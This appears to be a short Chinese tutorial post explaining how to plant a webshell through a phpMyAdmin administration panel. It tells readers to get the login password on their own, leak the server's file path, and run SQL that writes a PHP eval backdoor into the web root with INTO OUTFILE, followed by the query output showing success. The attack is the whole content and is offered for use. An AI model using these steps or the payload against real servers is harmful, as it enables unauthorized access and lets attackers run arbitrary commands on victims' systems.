教你phpMyAdmin 后台拿webshell
程序员文章站
2022-12-15 08:30:48
1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Cre... 08-10-08...
1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个database.运行以下语句.
----start code---
create table a (cmd text not null);
insert into a (cmd) values('<?php eval($_post[1]);?>');
select cmd from a into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php/d.php';
drop table if exists a;
----end code---
4.如果没什么意外.对应网站得到webshell
您运行的 sql 语句已经成功运行了。
sql 查询:
create table a(
cmd text not null
);# mysql 返回的查询结果为空(即零行)。
insert into a( cmd )
values (
'<?php eval($_post[1]);?>'
);# 影响列数: 1
select cmd
from a
into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php';# 影响列数: 1
drop table if exists a;# mysql 返回的查询结果为空(即零行)。
上一篇: redis5.0新特性
下一篇: 第一课《.net之--泛型》